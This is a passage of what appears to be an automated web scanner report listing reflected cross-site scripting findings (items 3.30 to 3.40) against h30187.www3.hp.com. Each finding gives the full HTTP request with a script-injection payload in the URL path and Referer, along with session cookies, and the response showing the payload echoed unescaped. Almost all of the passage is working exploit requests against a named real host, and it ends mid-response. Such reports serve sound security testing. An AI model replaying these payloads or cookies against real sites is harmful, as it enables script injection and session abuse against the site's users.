Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:06 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30810


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/index.jspca059"><script>alert(1)</script>af8ce681eb5?printable=true">
...[SNIP]...

3.30. http://h30187.www3.hp.com/is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a474"><script>alert(1)</script>54f6a1efe39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:33 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.31. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27635"><script>alert(1)</script>89d1adfe433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30743


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.32. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87dc"><script>alert(1)</script>440c3e7e92a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.33. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>a7d21fbf280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.34. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d811"><script>alert(1)</script>cbc1f160e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:34 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30715


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.35. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a53d"><script>alert(1)</script>ae87372c74c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:38 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30927


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.36. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef830"><script>alert(1)</script>ce745a8cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30843


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.37. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1aa"><script>alert(1)</script>e7977990f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.38. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a3a"><script>alert(1)</script>b8cff2f5c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.39. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e727"><script>alert(1)</script>526ec6956f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.40. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d0a"><script>alert(1)</script>829490b7dd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
